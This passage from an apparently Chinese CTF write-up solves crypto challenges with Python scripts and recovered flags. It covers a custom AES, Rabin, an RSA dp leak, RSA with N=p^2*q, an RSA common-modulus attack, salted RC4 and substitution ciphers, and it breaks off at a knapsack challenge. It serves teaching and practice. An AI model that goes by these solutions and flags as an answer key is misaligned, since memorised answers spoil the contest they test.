0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84,\n    0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf,\n    0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8,\n    0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2,\n    0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73,\n    0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb,\n    0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79,\n    0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08,\n    0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a,\n    0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e,\n    0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf,\n    0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16\n]\n\nINV_SBOX = [0]*256\nfor i in range(256): INV_SBOX[SBOX[i]] = i\n\nRCON = [0x00,0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1B,0x36]\n\ndef expand_key(k):\n    w = [[k[i*4+j] for j in range(4)] for i in range(6)]\n    for i in range(6, 52):\n        t = w[-1][:]\n        if i % 6 == 0:\n            t = t[1:] + t[:1]\n            t = [SBOX[x] for x in t]\n            t[0] ^= RCON[i\/\/6]\n        w.append([w[i-6][j] ^ t[j] for j in range(4)])\n    return w\n\ndef dec_block(c, w, inv_M):\n    s = [[c[j*4+i] for i in range(4)] for j in range(4)]\n    def add_key(r):\n        for j in range(4):\n            for i in range(4): s[j][i] ^= w[r*4+j][i]\n\n    add_key(12)\n    for i in range(4):\n        r = [s[j][i] for j in range(4)]\n        r = r[-i:] + r[:-i]\n        for j in range(4): s[j][i] = r[j]\n    for j in range(4):\n        for i in range(4): s[j][i] = INV_SBOX[s[j][i]]\n\n    for r in range(11, 0, -1):\n        add_key(r)\n        for j in range(4):\n            col = s[j]\n            ncol = [0]*4\n            for ri in range(4):\n                v = 0\n                for k in range(4):\n                    v ^= gf_mul(inv_M[ri][k], col[k])\n                ncol[ri] = v\n            s[j] = ncol\n        for i in range(4):\n            row = [s[j][i] for j in range(4)]\n            row = row[-i:] + row[:-i]\n            for j in range(4): s[j][i] = row[j]\n        for j in range(4):\n            for i in range(4): s[j][i] = INV_SBOX[s[j][i]]\n    add_key(0)\n    res = []\n    for j in range(4):\n        for i in range(4): res.append(s[j][i])\n    return bytes(res)\n\nc = [0x3A,0x23,0xFE,0x61,0xF3,0xE6,0x68,0xFA,0xCE,0x18,0x95,0x20,0x28,0x59,0x07,0x73,\n     0x91,0xCB,0xE7,0x00,0xCD,0x7E,0xCF,0x4D,0x28,0xD0,0xC4,0x99,0x81,0x9D,0xB4,0x95]\nk = b\"sierting_solarsec_qsnctf\"\niv = b\"c_qsnctf_chal_1x00\"\n\nw = expand_key(k)\nM = [\n    [7, 2, 5, 1],\n    [2, 5, 1, 7],\n    [1, 7, 2, 5],\n    [5, 1, 7, 2]\n]\ninv_M = inv_mat(M)\n\npt = b\"\"\nprev_c = iv\nfor i in range(0, 32, 16):\n    block = bytes(c[i:i+16])\n    decrypted = dec_block(block, w, inv_M)\n    pt_block = bytes([decrypted[j] ^ prev_c[j] for j in range(16)])\n    pt += pt_block\n    prev_c = block\n\nprint(pt.decode('utf-8'))<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{EzAes_w1tH_O6fuSed_1NstS}<\/code><\/pre>\n\n\n\n
Crypto<\/h1>\n\n\n\n
Four Ways to the Truth<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Four Ways to the Truth.txt<\/p>\n\n\n\n
p = 7843924760949873188201496026705455073125667712660002135887161079633254312879905501204855425456884502003894146991780856880279808965014803584494444568674087      \nq = 1140962409915024811090299765305244489074219812060197521898407764373654976342197131381234656216901694745972908393258042324146363330463003052469652666554471      \ne = 2\nc = 170041716912112266353311555796224814539989621875376673120238246557647197956716037204849248165596484091026430610474184173388604052966204512334147210403868840531083264816571442641437961<\/code><\/pre>\n\n\n\n
\u601d\u8def<\/strong><\/p>\n\n\n\n
\u9009\u53d6\u7d20\u6570 p \u548c q\u9700\u6ee1\u8db3\u6a214\u4f593\uff09\uff0c\u8ba1\u7b97<\/p>\n\n\n\n
n=pxq<\/p>\n\n\n\n
\u660e\u6587 m\u52a0\u5bc6
$$
c = m^2 bmod n
$$
\u539f\u7406\uff1a \u89e3\u4e8c\u6b21\u540c\u4f59\u65b9\u7a0b
$$
x^2 equiv c pmod n
$$
\u8ba1\u7b97\u6a21 p\u548c\u6a21 q\u7684\u6839\uff1a
$$
m_p = c^{(p+1)\/4} bmod p,m_q = c^{(q+1)\/4} bmod q
$$
\u6c42\u9006\u5143
$$
y_p = p^{-1} bmod q\uff0cy_q = q^{-1} bmod p
$$
\u7528\u4e2d\u56fd\u5269\u4f59\u5b9a\u7406\u7ec4\u54084\u4e2a\u89e3\uff1a
$$
r_1 = (m_p cdot y_q cdot q + m_q cdot y_p cdot p) bmod n
$$<\/p>\n\n\n\n
$$
r_2 = n – r_1
$$<\/p>\n\n\n\n
$$
r_3 = (m_p cdot y_q cdot q – m_q cdot y_p cdot p) bmod n
$$<\/p>\n\n\n\n
$$
r_4 = n – r_3
$$<\/p>\n\n\n\n
r\u7136\u540e4\u4e2a\u89e3\u8f6c\u4e3a\u5b57\u7b26\uff0c\u89e3\u7801\u7684\u5373\u4e3a\u660e\u6587<\/p>\n\n\n\n
py3\u811a\u672c<\/p>\n\n\n\n
def jiami(m, p, q):\n    return pow(m, 2, p * q)\n\ndef jiemi(c, p, q):\n    n = p * q\n    mp = pow(c, (p + 1) \/\/ 4, p)\n    mq = pow(c, (q + 1) \/\/ 4, q)\n    yp = pow(p, -1, q)\n    yq = pow(q, -1, p)\n\n    r1 = (mp * yq * q + mq * yp * p) % n\n    r2 = n - r1\n    r3 = (mp * yq * q - mq * yp * p) % n\n    r4 = n - r3\n\n    for r in (r1, r2, r3, r4):\n        try:\n            print(r.to_bytes((r.bit_length() + 7) \/\/ 8, 'big').decode('utf-8'))\n        except:\n            pass\n\np = 7843924760949873188201496026705455073125667712660002135887161079633254312879905501204855425456884502003894146991780856880279808965014803584494444568674087\nq = 1140962409915024811090299765305244489074219812060197521898407764373654976342197131381234656216901694745972908393258042324146363330463003052469652666554471\nc = 170041716912112266353311555796224814539989621875376673120238246557647197956716037204849248165596484091026430610474184173388604052966204512334147210403868840531083264816571442641437961\n\njiemi(c, p, q)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{e76926fb679f90b8367463ad2b0c27f4}<\/code><\/pre>\n\n\n\n
Half a Key<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Half a Key.txt<\/p>\n\n\n\n
n  = 15436586506265382785524723267926444275462583019354383194654618933970433830434544481689625981207606375978708092558218246652496848076710411132268953499043735379180887935756772262155008862710764094267410967565241203605386593697737434875910984139143271151900377372693190411504735649123965519189648830868758032067\ne  = 65537\ndp = 379731142995118368195086502083726192650138136864805821111741080341262318450359112900427553070639257250091100401461103206486523535760843615494638091936809\nc  = 854977693463411460490582164652536883002498905251706308634386005958509682016980677282553767296915296737583796051269333809745316569004849097563723358017329758234680761174609149316747091398434695986939450351231497326579265836956690907677434464255178122585307742001203732956675315052213672484434073446872723134\n<\/code><\/pre>\n\n\n\n
\u9898\u76ee\u7ed9\u4e86 dp\uff0c\u7a81\u7834\u53e3\u5728
$$
e times dp equiv 1 pmod{p-1}\u8fd9\u4e2a\u516c\u5f0f\u4e0a
$$
\u53d8\u6362\u4e00\u4e0b\u5c31\u662f
$$
e times dp – 1 = k(p-1)
$$
\u610f\u5473\u7740
$$
e times dp – 1
$$
\u80af\u5b9a\u662f p-1 \u7684\u500d\u6570<\/p>\n\n\n\n
\u56e0\u4e3a
$$
dp < p-1
$$
\u53ef\u5f97<\/p>\n\n\n\n
\u63a8\u5bfc\u51fa\u500d\u6570 k < e\u3002\u9898\u91cc\u7684 e \u662f 65537\uff0c\u975e\u5e38\u5c0f\uff0c\u76f4\u63a5\u5faa\u73af\u7a77\u4e3e k \u7684\u503c\u5c31\u80fd\u53cd\u63a8\u7b97\u51fa p\u3002<\/p>\n\n\n\n
\u7b97\u51fa p \u540e\u5224\u65ad n \u80fd\u4e0d\u80fd\u88ab\u5b83\u6574\u9664\uff0c\u80fd\u6574\u9664\u5c31\u7b97\u627e\u5bf9\u4e86\uff0c\u987a\u624b\u9664\u4e00\u4e0b\u62ff\u5230 q\u3002\u540e\u9762\u5c31\u662f\u6700\u57fa\u7840\u7684 RSA \u6d41\u7a0b\uff0c\u6c42\u6b27\u62c9\u51fd\u6570\u3001\u6c42\u79c1\u94a5 d \u8fd8\u539f\u660e\u6587\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
n = 15436586506265382785524723267926444275462583019354383194654618933970433830434544481689625981207606375978708092558218246652496848076710411132268953499043735379180887935756772262155008862710764094267410967565241203605386593697737434875910984139143271151900377372693190411504735649123965519189648830868758032067\ne = 65537\ndp = 379731142995118368195086502083726192650138136864805821111741080341262318450359112900427553070639257250091100401461103206486523535760843615494638091936809\nc = 854977693463411460490582164652536883002498905251706308634386005958509682016980677282553767296915296737583796051269333809745316569004849097563723358017329758234680761174609149316747091398434695986939450351231497326579265836956690907677434464255178122585307742001203732956675315052213672484434073446872723134\n\nfor k in range(1, e):\n    if (e * dp - 1) % k == 0:\n        p = (e * dp - 1) \/\/ k + 1\n        if n % p == 0:\n            q = n \/\/ p\n            phi = (p - 1) * (q - 1)\n            d = pow(e, -1, phi)\n            m = pow(c, d, n)\n            print(m.to_bytes((m.bit_length() + 7) \/\/ 8, 'big').decode('utf-8'))\n            break<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{136c40e7a4d7ec032f28cd63ed090781}<\/code><\/pre>\n\n\n\n
0x42F<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6700\u5f00\u59cb\u6211\u4ee5\u4e3a\u662femojisAES\u5462\u8fd8\u6709xor\u7ed9\u4f60\u5bc6\u94a5\uff0c\u89e3\u5bc6\u5462\uff0c\u7ed3\u679c\u662f\u7279\u5b9a\u7f51\u7ad9\u89e3\uff0c666<\/p>\n\n\n\n
\u6839\u636e\u9898\u76ee\u63d0\u793a\u548c\u63cf\u8ff0\uff0c\u627e\u7f51\u7ad9<\/p>\n\n\n\n
\u6700\u540e\u662f\u8fd9\u4e2a\u7f51\u7ad9\uff1aTxtmoji | Encrypt Text to Emojis<\/a><\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5bc6\u7801\u662f\u6570\u5b57 \u90a3\u4e48\u5c06\u9898\u76ee\u540d\u5b57\u5341\u516d\u8fdb\u5236\u6539\u6210\u5341\u8fdb\u5236\u5c31\u884c\uff1a0x42F–>1071<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{W31C0M3_70_3M0J!}<\/code><\/pre>\n\n\n\n
NO ASCII<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Quoted\u89e3\u7801<\/p>\n\n\n\n
flag{=E9=9D=92=E5=B0=91=E5=B9=B4CTF=E6=AC=A2=E8=BF=8E=E4=BD=A0}<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{\u9752\u5c11\u5e74CTF\u6b22\u8fce\u4f60}<\/code><\/pre>\n\n\n\n
\u5b57\u7b26\u4e32\u7684\u79d8\u5bc6<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Sara, yoh vikk amjure on un axciting bohrnay of kaurning ujoht cyjarlachrity. Va suda prapuraz u comprasanlida kaurning puts for yoh, gruzhukky ansuncing yohr lachrity cupujikitial from julic enovkazga to uzduncaz leikkl. For axumpka: MwehM3f1WL8mUQIME0UFBE0=<\/code><\/pre>\n\n\n\n
\u5355\u8868\u66ff\u6362\u5bc6\u7801rot13\u7136\u540e\u5728base64\u5c31\u884c<\/p>\n\n\n\n
\u901a\u8fc7\u5206\u6790\u8bcd\u9891\u548c\u4e0a\u4e0b\u6587\uff08\u5982 cyjarlachrity \u663e\u7136\u5355\u8bcd\u662f cybersecurity\uff09\uff0c\u6211\u4eec\u53ef\u4ee5\u63a8\u5bfc\u51fa\u66ff\u6362\u8868\u3002<\/p>\n\n\n\n
\u5bc6\u6587\uff1aSara, yoh vikk amjure on un axciting bohrnay of kaurning ujoht cyjarlachrity. Va suda prapuraz u comprasanlida kaurning puts for yoh, gruzhukky ansuncing yohr lachrity cupujikitial from julic enovkazga to uzduncaz leikkl. For axumpka:\n\n\u660e\u6587\uff1aHere, you will embark on an exciting journey of learning about cybersecurity. We have prepared a comprehensive learning path for you, gradually enhancing your security capabilities from basic knowledge to advanced skills. For example:<\/code><\/pre>\n\n\n\n
\u66ff\u6362\u89c4\u5219\uff08\u5bc6\u6587\u5b57\u6bcd -> \u660e\u6587\u5b57\u6bcd\uff09<\/p>\n\n\n\n
a -> e\nb -> j\nd -> v\ne -> k\nh -> u\nj -> b\nk -> l\nl -> s\ns -> h\nu -> a\nv -> w\nw -> z (\u6839\u636e\u5b57\u6bcd\u66ff\u6362\u7684\u95ed\u73af\u63a8\u5bfc\u5f97\u51fa)\nz -> d\n\u5176\u4ed6\u5b57\u6bcd\uff08\u5982 c, f, g, i, m, n, o, p, q, r, t, x, y \u7b49\uff09\u4fdd\u6301\u4e0d\u53d8\u3002<\/code><\/pre>\n\n\n\n
\u539f\u5b57\u7b26\u4e32\u662f\uff1a<\/p>\n\n\n\n
MwehM3f1WL8mUQIME0UFBE0=<\/code><\/pre>\n\n\n\n
\u66ff\u6362\u540e\u7684\u5b57\u7b26\u4e32<\/p>\n\n\n\n
MzkuM3f1ZS8mAQIMK0AFJK0=<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{50_345Y_CRY}<\/code><\/pre>\n\n\n\n
easy RSA<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5df2\u77e5\u4e00\u6bb5\u52a0\u5bc6\u4fe1\u606f\u4e3a\uff1a0x5f6ea1f38716c33d60\uff0c\u4e14\u5df2\u77e5\u52a0\u5bc6\u6240\u7528\u7684\u516c\u94a5\uff1a(N=4382400036133367223779 e = 23)\uff0c\u8bf7\u89e3\u5bc6\u51fa\u660e\u6587\uff0c\u63d0\u4ea4\u65f6\u8bf7\u5c06\u6570\u5b57\u8f6c\u5316\u6210 ASCII \u7801\u63d0\u4ea4\uff0c\u6bd4\u5982\u4f60\u89e3\u51fa\u7684\u660e\u6587\u662f 0x6162\uff0c\u8bf7\u63d0\u4ea4\u5b57\u7b26\u4e32 flag{ab}\u3002<\/code><\/pre>\n\n\n\n
\u53d8\u79cdRSA<\/p>\n\n\n\n
N\u53ea\u670922\u4f4d\u6570\u5b57\uff0c\u6570\u503c\u6781\u5c0f\uff0c\u76f4\u63a5\u62ff\u53bb\u66b4\u529b\u5206\u89e3\u3002<\/p>\n\n\n\n
\u5206\u89e3\u540e\u53d1\u73b0N\u4e0d\u662f\u5e38\u89c4\u7684\u4e24\u4e2a\u4e0d\u540c\u7d20\u6570\u76f8\u4e58\uff0c\u800c\u662f\u5b58\u5728\u5e73\u65b9\u9879\uff0c\u5b9e\u9645\u7ed3\u6784\u4e3a<\/p>\n\n\n\n
N = p^2 * q<\/code><\/pre>\n\n\n\n
\u5177\u4f53\u5206\u89e3\u51fa p = 13574881\uff0cq = 23781539<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u52a0\u5bc6\u662f\u6807\u51c6RSA\u52a0\u5bc6\uff0c\u660e\u6587\u7684e\u6b21\u65b9\u5bf9N\u53d6\u6a21\u5f97\u51fa\u5bc6\u6587c\u3002<\/p>\n\n\n\n
\u89e3\u5bc6<\/p>\n\n\n\n
\u6b27\u62c9\u51fd\u6570\u7684\u66ff\u6362\uff0c\u56e0\u4e3a<\/p>\n\n\n\n
N = p^2 * q\uff0c\u6b27\u62c9\u51fd\u6570phi\u4e0d\u80fd\u518d\u7528(p-1)*(q-1)\u6539\u6210 p * (p-1) * (q-1)\u3002\n\u7b97\u51fa\u6b63\u786e\u7684phi\u540e\uff0c\u6c42e\u7684\u4e58\u6cd5\u9006\u5143\u62ff\u5230\u79c1\u94a5d\u3002\u76f4\u63a5\u7528\u5bc6\u6587c\u7684d\u6b21\u65b9\u5bf9N\u53d6\u6a21\u7b97\u51fa\u660e\u6587\u6570\u5b57\uff0c\u6700\u540e\u8f6c\u6210\u5b57\u8282\u89e3\u7801\u5305\u4e0aflag\u683c\u5f0f\u5373\u53ef\u3002<\/code><\/pre>\n\n\n\n
py3\u4ee3\u7801<\/p>\n\n\n\n
from Crypto.Util.number import long_to_bytes\n\nn = 4382400036133367223779\ne = 23\nc = 0x5f6ea1f38716c33d60\n\np = 13574881\nq = 23781539\n\nphi = p * (p - 1) * (q - 1)\nd = pow(e, -1, phi)\nm = pow(c, d, n)\n\nprint(f\"flag{{{long_to_bytes(m).decode()}}}\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{flag}<\/code><\/pre>\n\n\n\n
big e<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
chall.py<\/p>\n\n\n\n
from Crypto.Util.number import bytes_to_long, getPrime\n\nflag = b\"qsnctf{}\"\n\npt = bytes_to_long(flag)\n\np = getPrime(1024)\nq = getPrime(1024)\nn = p*q\n\ne_1 = getPrime(16)\ne_2 = getPrime(16)\n\nct_1 = pow(pt, e_1, n)\nct_2 = pow(pt, e_2, n)\nprint(\"ct_1 = \", ct_1)\nprint(\"ct_2 = \", ct_2)\n\nprint(\"e_1 = \", e_1)\nprint(\"e_2 = \", e_2)\n\nprint(\"n = \", n)\n\n# ct_1 =  5649565335684829166994703709424227526893862676464227714220335589276704152604924324114025311155729514770870986954236504564704555535527067819510001985630888010489410355084498786686405391985307787813163409887408873131599860500818287249474949435981248525429437566989511739623645812030127508754237307712031275069780710099525638162980612740682033778940586593666680892993610688520294640884980062959079158405843270214715267881440440339150600253703915746065480485251932360881192748881417272231086499695809894156350146444967947730629173024309214554705882003920254677073584631736742572109190599880801473561959319027076441953445\n# ct_2 =  18057738004521442202581208706347939725140669900210781627129228864852861993001064574996038998190758020094241377866589024516040225406530219251533264723200285643625227689027372929065070061403841600339743979018711778484342112384547861311017571072207706363341501151970830224052331515660939863240931224477883263629549854691715424922845010950429159326308647808310970838674468530257927010981568201656330319135247562919603753523391148946139453657084433473736518140826834607288043167145971704069967785291825113657089124890698730576640845997643271760048177660480776933178966895624625446578014520381072642845438343988815282525599\n# e_1 =  38393\n# e_2 =  33179\n# n =  20041933763448357190627850343717972264528582967835527546142957190548605428270610029367862231281895787713359644234851479710776535385541439755032309687483077090218979985453754364407030590831392946785171723586209911295724249654470575605442111447225710502302358942926274605617178895040432859429896967144420329616663507781993472314294836911728767905434642257924102824396656593460442406211312774327070056184991640489525243074951726793316964397447506279491375765341749074988401265888189321863750941333198393830420513963816131832584076574157616777287739971033307821046386250151071559472869001815834079430740105662029229636911<\/code><\/pre>\n\n\n\n
RSA \u5171\u6a21\u653b\u51fb<\/p>\n\n\n\n
\u52a0\u5bc6<\/p>\n\n\n\n
\u540c\u4e00\u6bb5\u660e\u6587\u88ab\u540c\u4e00\u4e2a\u6a21\u6570n\u52a0\u5bc6\u4e86\u4e24\u6b21\uff0c\u53ea\u662f\u6bcf\u6b21\u7528\u7684\u516c\u94a5\u6307\u6570\u4e0d\u540c\uff0c\u5206\u522b\u662fe_1\u548ce_2\uff0c\u4ece\u800c\u751f\u6210\u4e86\u4e24\u4e2a\u5bc6\u6587ct_1\u548cct_2\u3002<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6\u903b\u8f91\uff1a\ne_1\u548ce_2\u662f\u4e92\u8d28\u7684\uff0c\u6700\u5927\u516c\u7ea6\u6570\u4e3a1\u3002\u5229\u7528\u6269\u5c55\u6b27\u51e0\u91cc\u5f97\u7b97\u6cd5\u80fd\u7b97\u51fa\u4e24\u4e2a\u7cfb\u6570s\u548ct\uff0c\u6ee1\u8db3e_1 * s + e_2 * t = 1\u3002<\/code><\/pre>\n\n\n\n
\u62ff\u5230\u7cfb\u6570\u76f4\u63a5\u62ff\u5bc6\u6587\uff0c\u7136\u540e\u8ba1\u7b97(ct_1^s * ct_2^t) mod n\uff0c\u5e95\u5c42\u7684\u6307\u6570\u76f8\u52a0\u521a\u597d\u51d1\u62101\uff0c\u7b97\u51fa\u6765\u7684\u76f4\u63a5\u5c31\u662f\u660e\u6587\u3002<\/p>\n\n\n\n
\u91cc\u9762\u80af\u5b9a\u6709\u4e2a\u7cfb\u6570\u662f\u8d1f\u6570\uff0c\u628a\u90a3\u4e2a\u8d1f\u6570\u5bf9\u5e94\u7684\u5bc6\u6587\u6c42\u4e2a\u6a21\u9006\u5143\uff0c\u6307\u6570\u7ffb\u6b63\u7167\u6837\u4e58\u5c31\u884c\u4e86\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
from Crypto.Util.number import long_to_bytes\n\ndef egcd(a, b):\n    if a == 0:\n        return b, 0, 1\n    else:\n        g, y, x = egcd(b % a, a)\n        return g, x - (b \/\/ a) * y, y\n\nn = 20041933763448357190627850343717972264528582967835527546142957190548605428270610029367862231281895787713359644234851479710776535385541439755032309687483077090218979985453754364407030590831392946785171723586209911295724249654470575605442111447225710502302358942926274605617178895040432859429896967144420329616663507781993472314294836911728767905434642257924102824396656593460442406211312774327070056184991640489525243074951726793316964397447506279491375765341749074988401265888189321863750941333198393830420513963816131832584076574157616777287739971033307821046386250151071559472869001815834079430740105662029229636911\ne_1 = 38393\ne_2 = 33179\nct_1 = 5649565335684829166994703709424227526893862676464227714220335589276704152604924324114025311155729514770870986954236504564704555535527067819510001985630888010489410355084498786686405391985307787813163409887408873131599860500818287249474949435981248525429437566989511739623645812030127508754237307712031275069780710099525638162980612740682033778940586593666680892993610688520294640884980062959079158405843270214715267881440440339150600253703915746065480485251932360881192748881417272231086499695809894156350146444967947730629173024309214554705882003920254677073584631736742572109190599880801473561959319027076441953445\nct_2 = 18057738004521442202581208706347939725140669900210781627129228864852861993001064574996038998190758020094241377866589024516040225406530219251533264723200285643625227689027372929065070061403841600339743979018711778484342112384547861311017571072207706363341501151970830224052331515660939863240931224477883263629549854691715424922845010950429159326308647808310970838674468530257927010981568201656330319135247562919603753523391148946139453657084433473736518140826834607288043167145971704069967785291825113657089124890698730576640845997643271760048177660480776933178966895624625446578014520381072642845438343988815282525599\n\n_, s, t = egcd(e_1, e_2)\n\nif s < 0:\n    s = -s\n    ct_1 = pow(ct_1, -1, n)\nif t < 0:\n    t = -t\n    ct_2 = pow(ct_2, -1, n)\n\nm = (pow(ct_1, s, n) * pow(ct_2, t, n)) % n\nprint(long_to_bytes(m).decode())<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{ba1073db090b3090c111339b0a7ffce5}<\/code><\/pre>\n\n\n\n
easy RC4<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4ec0\u4e48RC4\uff1f\n9PKjvafI0SxgbC87AIDyADcmoBX6rdk9VD2UpHo=\nKey\uff1aqsnctf2026<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6\u539f\u7406\uff1a<\/strong><\/p>\n\n\n\n
\u8fd9\u4e2a\u9898\u76ee\u7528\u4e00\u79cd\u5e26\u76d0\uff08Salt\uff09\u7684 RC4 \u53d8\u79cd\u52a0\u5bc6\u3002\u52a0\u5bc6\u65f6\uff0c\u7cfb\u7edf\u4f1a\u5148\u751f\u6210 16 \u5b57\u8282\u7684\u968f\u673a\u76d0\uff0c\u5c06\u5176\u4e0e\u63d0\u4f9b\u7684\u539f\u59cb\u5bc6\u94a5\u62fc\u63a5\u5e76\u8fdb\u884c SHA1 \u54c8\u5e0c\uff0c\u8ba1\u7b97\u51fa\u771f\u6b63\u7684 RC4 \u5bc6\u94a5\u3002\u968f\u540e\uff0c\u7528\u8be5\u6d3e\u751f\u5bc6\u94a5\u5bf9\u660e\u6587\u8fdb\u884c\u6807\u51c6 RC4 \u52a0\u5bc6\uff0c\u6700\u540e\u5c06 16\u5b57\u8282Salt + \u5bc6\u6587 \u62fc\u63a5\u5728\u4e00\u8d77\uff0c\u8fdb\u884c Base64 \u7f16\u7801\u540e\u8f93\u51fa\u3002<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6<\/p>\n\n\n\n
\u5bf9 Base64 \u5bc6\u6587\u8fdb\u884c\u89e3\u7801\uff0c\u5f97\u5230\u539f\u59cb\u5b57\u8282\u6d41\u3002\n\u622a\u53d6\u524d 16 \u5b57\u8282\u4f5c\u4e3a Salt\uff0c\u5269\u4f59\u90e8\u5206\u4e3a\u771f\u6b63\u7684 RC4 \u5bc6\u6587\u3002\n\u8ba1\u7b97 SHA1(\u539f\u59cb\u5bc6\u94a5 + Salt)\uff0c\u6062\u590d\u51fa\u771f\u6b63\u7684 RC4 \u5bc6\u94a5\u3002\n\u5c06\u771f\u5b9e\u7684\u5bc6\u6587\u4e0e\u6062\u590d\u51fa\u7684\u5bc6\u94a5\u8f93\u5165\u6807\u51c6 RC4 \u7b97\u6cd5\u8fdb\u884c\u5f02\u6216\u89e3\u5bc6\uff0c\u5373\u53ef\u5f97\u5230 flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import base64\nfrom hashlib import sha1\n\ndef rc4(data: bytes, key: bytes) -> bytes:\n    S = list(range(256))\n    j = 0\n    for i in range(256):\n        j = (j + S[i] + key[i % len(key)]) % 256\n        S[i], S[j] = S[j], S[i]\n\n    i = 0\n    j = 0\n    res = bytearray()\n    for byte in data:\n        i = (i + 1) % 256\n        j = (j + S[i]) % 256\n        S[i], S[j] = S[j], S[i]\n        K = S[(S[i] + S[j]) % 256]\n        res.append(byte ^ K)\n    return bytes(res)\n\ndef solve():\n    b64_cipher = \"9PKjvafI0SxgbC87AIDyADcmoBX6rdk9VD2UpHo=\"\n    key = \"qsnctf2026\"\n\n    raw = base64.b64decode(b64_cipher)\n    salt = raw[:16]\n    cipher = raw[16:]\n\n    real_key = sha1(key.encode('utf-8') + salt).digest()\n    flag = rc4(cipher, real_key)\n\n    print(flag.decode('utf-8'))\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{e12ax8u}<\/code><\/pre>\n\n\n\n
Knapsack<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
enc.py<\/p>\n\n\n\n
from Crypto.Util import number\nfrom Crypto import Random\n\nFLAG = b\"flag{XXXXXX}\"\n\ndef generate_keys(bit_len):\n    rand = Random.new().read\n\n    upper = 1 << (2 * bit_len + 4)\n    sk = [number.getRandomRange(1, upper, rand)]\n\n    for _ in range(1, bit_len):\n        sk.append(number.getRandomRange(sum(sk) + 1, upper, rand))\n        upper <<= 2\n\n    N = number.getRandomRange(sk[-1] + 1, 2 * sk[-1], rand)\n\n    mask = number.getRandomRange(N \/\/ 4, 3 * N \/\/ 4, rand)\n    while number.GCD(mask, N) != 1:\n        mask = number.getRandomRange(1, N, rand)\n\n    pk = [s * mask % N for s in sk]\n    return sk, pk, N, mask\n\ndef encrypt(bitstring, pk):\n    return sum(int(bitstring[i]) * pk[i] for i in range(len(pk)))\n\ndef main():\n    # flag -> bitstring\n    bitstring = bin(int(FLAG.hex(), 16))[2:]\n    if len(bitstring) % 8 != 0:\n        bitstring = '0' * (8 - len(bitstring) % 8) + bitstring\n\n    sk, pk, N, mask = generate_keys(len(bitstring))\n    enc = encrypt(bitstring, pk)\n\n    # ===== \u8f93\u51fa\u7ed9\u9009\u624b\u7684\u5185\u5bb9 =====\n    print(\"===== Public Key (pk) =====\")\n    print(pk)\n    print(\"n===== Ciphertext (enc) =====\")\n    print(enc)\n\n    # ===== \u51fa\u9898\u4eba\u81ea\u7559\uff08\u8c03\u8bd5\u7528\uff0c\u6b63\u5f0f\u51fa\u9898\u8bf7\u5220\u6389\uff09=====\n    # print(\"n[DEBUG]\")\n    # print(\"sk =\", sk)\n    # print(\"N  =\", N)\n    # print(\"mask =\", mask)\n\nif __name__ == \"__main__\":\n    main()\n<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6\u8fc7\u7a0b<\/p>\n\n\n\n
